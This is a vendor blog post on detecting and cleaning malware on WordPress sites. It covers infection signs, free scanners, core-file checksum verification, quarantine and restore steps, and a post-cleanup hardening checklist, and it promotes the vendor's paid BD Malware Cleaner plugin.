How to Scan WordPress for Malware (And What to Do When You Find It)

A clean WordPress install has roughly 2,000 files and a predictable hash for each one. If even one core file’s hash has changed, your site is either modified intentionally (rare) or compromised (common). This post walks through how to scan WordPress for malware properly — starting with free tools you should try first, then moving to dedicated scanners, then what to actually do when you find something.

If your site is currently down or showing spam links you didn’t add, skip to the “Triage when you confirm an infection” section. If you’re scanning preventatively, read top to bottom.

Signs your WordPress site is infected

Before any tool, eyeball check. These are the patterns we see most often:

• SEO spam in HTML. View source on your homepage. Search for words like “pharma”, “casino”, “loan”, “viagra”. If you find anchor text linking to sites you don’t recognize, especially in the footer or hidden in <div style="display:none"> blocks, that’s spam injection.
• Sudden organic traffic drop. Check Google Search Console. If your impressions fell off a cliff and your “Security Issues” tab shows warnings, Google flagged you.
• Unexpected admin users. Users → All Users in wp-admin. Anyone with administrator role you didn’t create is a takeover.
• Modified core files. This is the gold standard for detection, covered in detail below. If wp-load.php or wp-config.php has been edited since you last touched it, that’s a flag.
• Unusual outbound traffic. Your host’s bandwidth dashboard suddenly spikes when you’re not running a campaign. Often means your site is being used to send spam or attack other sites.
• Login redirects. You try to log in and get bounced to a random URL. Common with wp_options.siteurl being overwritten.
• Browser warnings. Chrome shows “Deceptive site ahead” or your hosting control panel emails you about a malware finding.

Any one of these is reason to scan immediately. Multiple signs together means you’re almost certainly compromised.

Free options to try first

We’re going to recommend our own paid tool further down. Before you spend money, run these. They’re free, they’re trustworthy, and they may catch the obvious stuff without you needing a plugin.

1. WPScan CLI

WPScan is an open-source vulnerability scanner maintained by Automattic (the company behind WordPress.com). It checks your site against a database of known vulnerable plugins, themes, and core versions. It does not directly scan files for malware — it tells you what attack surface you’re exposing.

wpscan --url https://yoursite.com --enumerate p,t,u --api-token YOUR_TOKEN

The free WPScan API tier gives you 25 requests per day, which is plenty for one-off audits. If WPScan reports vulnerable plugins, update or remove them before you do anything else.

2. Sucuri SiteCheck (free)

sitecheck.sucuri.net is a free, no-account-needed external scanner. It loads your site as a browser would, checks the rendered HTML for known malware signatures, checks blacklists (Google Safe Browsing, Norton, McAfee), and reports back in 30 seconds.

It’s not exhaustive — it can’t see PHP malware that doesn’t render to the front-end. But it catches the most common visible compromises (SEO spam, redirects, defacement, blacklist hits) and we’d be obviously dishonest not to mention it before pitching our own scanner.

3. Google Search Console

If you haven’t connected your site to Search Console, do it now. Free, takes 5 minutes. The “Security Issues” tab is the most authoritative source on whether Google considers your site compromised. If Google flagged you, no amount of plugin scanning will lift the warning until you clean the site and request a review there.

Why WordPress core checksums are the gold standard

Here’s why dedicated WordPress scanners catch things generic scanners miss: WordPress publishes canonical MD5 checksums for every core file in every released version, served from https://api.wordpress.org/core/checksums/1.0/?version=6.5&locale=en_US.

That means a proper WordPress malware scanner can:

1. Download the canonical checksum list for your WP version.
2. Hash every file in wp-admin/ and wp-includes/ on your install.
3. Flag any file whose hash doesn’t match — or any file that exists on your install but not in the canonical list (backdoor file injected into core directories).

Generic malware scanners can’t do this. They pattern-match for known malware signatures, which catches commodity infections but misses targeted backdoors that don’t look like anything in their signature library.

Backdoors hidden inside core files are the hardest to find by eye. Checksum verification finds them in seconds. This is why every serious WordPress security tool — Wordfence, Sucuri, MalCare, and ours — implements it.

Our approach: BD Malware Cleaner

BD Malware Cleaner does four things:

1. WordPress core checksum verification against the wp.org canonical list.
2. Signature scanning against 50+ malware patterns (eval-base64 chains, web shells, SEO spam injectors, etc.).
3. PHP-in-uploads detection — any .php file in wp-content/uploads/ is almost always malicious.
4. Double-extension detection — files like invoice.pdf.php that try to disguise themselves.
5. World-writable file warnings — files with 0777 permissions that an attacker could overwrite.

The scanner runs in chunked AJAX — 50 files per chunk in the UI, 200 per chunk via cron — for the same reason our backup plugin does: shared hosts kill long-running PHP. A monolithic scan of a 5,000-file WordPress install times out. A chunked scan finishes. Findings go to a quarantine system: suspicious files are moved (not deleted) to wp-content/uploads/bdmc-quarantine/ with restore metadata, so you can recover anything we flagged in error.

$49/year per site. Same as the rest of the catalog. 30-day refund.

Step-by-step: scan a site for malware

We’ll assume you’ve already tried the free options above. This section is what to do with BD Malware Cleaner installed. If you’re using a different scanner the order is similar.

Step 1 — Install BD Malware Cleaner

WP Admin → Plugins → Add New → upload the plugin zip from your purchase email. Activate. The plugin adds a “BD Malware” menu item in the WP admin sidebar.

Step 2 — Run a full scan

BD Malware → Scan → Run Full Scan. The scanner kicks off chunked AJAX requests. Watch the progress bar — for a typical site (~3,000 files) it completes in 2–5 minutes. Don’t navigate away from the page; if you do, the scan pauses (it’ll resume when you return).

Step 3 — Review findings

When the scan finishes, results appear in three categories:

• Modified core files — anything whose hash doesn’t match wp.org canonical. Always investigate.
• Suspicious files — pattern-matched malware. High confidence usually means real malware; lower confidence sometimes catches legitimate caching or optimization plugins.
• Warnings — PHP in uploads, double extensions, world-writable files. Each one is a flag for human review, not necessarily malware.

For each finding, the plugin shows the file path, the snippet that matched, and a confidence score. Click “View” to see the full context before you act.

Step 4 — Quarantine, don’t delete

For any file you’re confident is malicious: click “Quarantine”. The file moves to wp-content/uploads/bdmc-quarantine/ with a timestamp and the original path stored. Your live site is now clean of that file. If you discover later that you quarantined something you shouldn’t have, you can restore it from the quarantine log.

Don’t delete quarantined files for at least 30 days. False positives happen.

Step 5 — Restore modified core files

For any core file that fails checksum: replace it with the canonical version from WordPress.org. The simplest method:

1. Download the same WordPress version zip from wordpress.org.
2. Replace the modified file from the canonical zip via FTP or your host’s file manager.
3. Re-run the scan to confirm the file now passes checksum.

Do not edit core files manually. Replace from canonical only.

Step 6 — Change all passwords

If you found a real compromise: every admin password, every database password (in wp-config.php), every FTP/SFTP credential, every API key stored in WordPress. Assume everything credentialed inside that install is leaked.

Step 7 — Restore from backup if needed

If the infection is widespread (dozens of modified files, unknown how long it’s been there, persistent reinfection after cleanup), the safest move is to restore from a clean backup taken before the infection. This is where BD Backup earns its keep — and why backup-rotation matters. If your only backup is from yesterday and the infection is two weeks old, you’re restoring an already-compromised site.

Step 8 — Schedule recurring scans

BD Malware → Settings → Schedule → Daily or Weekly. Daily is recommended for any site running e-commerce, user accounts, or any sensitive workflow. Weekly is fine for a brochure site you rarely update.

After cleanup: the hardening checklist

Cleanup without hardening means reinfection. Run through this list:

• [ ] Update WordPress core to the latest version.
• [ ] Update every plugin and theme. Vulnerabilities in outdated plugins are how most infections start.
• [ ] Delete inactive plugins and themes. A deactivated plugin can still be exploited if its files exist.
• [ ] Enforce strong passwords for admin users. BD Security Firewall has a force-strong-passwords option (12+ characters).
• [ ] Enable 2FA on every admin account. TOTP authenticator app preferred over SMS or email.
• [ ] Lockout brute-force attempts. Default in BD Security Firewall: 3 attempts, 60-minute lockout.
• [ ] Hide WP version from page source — small mitigation, helps reduce automated targeting.
• [ ] Disable XML-RPC unless you actively use it (most sites don’t).
• [ ] Disable the WordPress file editor in wp-config.php: define('DISALLOW_FILE_EDIT', true);. This prevents an attacker who gains admin access from editing PHP files through the WP UI.
• [ ] Block PHP execution in uploads. Either via .htaccess in wp-content/uploads/ or through BD Security Firewall’s PHP-uploads block.
• [ ] Geo-block countries you don’t do business with — if your customers are US-only, blocking RU/CN/KP shrinks your attack surface meaningfully.
• [ ] Run scheduled backups daily (or every 6 hours for high-change sites). Test a restore quarterly.

This isn’t all WordPress security. It’s the realistic minimum.

Triage when you confirm an infection

If you found malware right now and you’re reading this in panic mode, here’s the abbreviated version:

1. Take the site offline temporarily — maintenance mode plugin or .htaccess IP whitelist.
2. Change your hosting and WordPress admin passwords immediately.
3. Take a fresh backup of the compromised state (forensic record, in case you need it).
4. Run BD Malware Cleaner full scan, quarantine all high-confidence findings.
5. Restore modified core files from canonical.
6. If infection is widespread, restore from the most recent known-clean backup.
7. Apply the hardening checklist above before taking the site back online.
8. If your traffic dropped because Google flagged you, request review in Search Console once clean.

FAQ

Can I scan WordPress for malware without a plugin?
Yes. Sucuri SiteCheck (free, web-based) catches visible infections. WPScan CLI catches vulnerable plugins. Manual WordPress core checksum comparison is possible with wp core verify-checksums if you have WP-CLI installed. These cover most cases. Dedicated scanner plugins catch what’s hidden in PHP that doesn’t render to the browser.

What’s the difference between malware scanning and a firewall?
A firewall blocks attacks before they succeed. A scanner finds malware after a successful attack. You want both. The firewall reduces the chance of infection; the scanner catches what got through. Running a scanner without a firewall is reactive only — you’ll be cleaning up the same kind of compromise repeatedly.

How often should I scan?
Daily for e-commerce, membership, or any site handling user data. Weekly for content sites and blogs. After any plugin or theme installation, run a scan regardless of schedule.

What if the scanner finds a false positive?
Quarantine, don’t delete. BD Malware Cleaner moves flagged files to a quarantine folder with restore metadata. If the file turns out to be legitimate (a caching plugin’s encoded file, for example), you restore from quarantine in one click. Keep quarantined files for at least 30 days.

Will scanning slow down my site?
A scheduled scan during low-traffic hours has minimal user-facing impact. BD Malware Cleaner’s chunked scanner is designed not to spike memory or CPU. If your host emails you about resource usage during scans, reduce the chunk size or schedule scans weekly instead of daily.

My host says they scan for malware. Why do I need a plugin?
Host-level scanning typically finds commodity malware and known-bad files. It rarely catches modified WordPress core files (because hosts don’t have your specific WP version checksum context) or backdoors hidden in plugin code. Host scanning + WordPress-aware plugin scanning together is the realistic standard.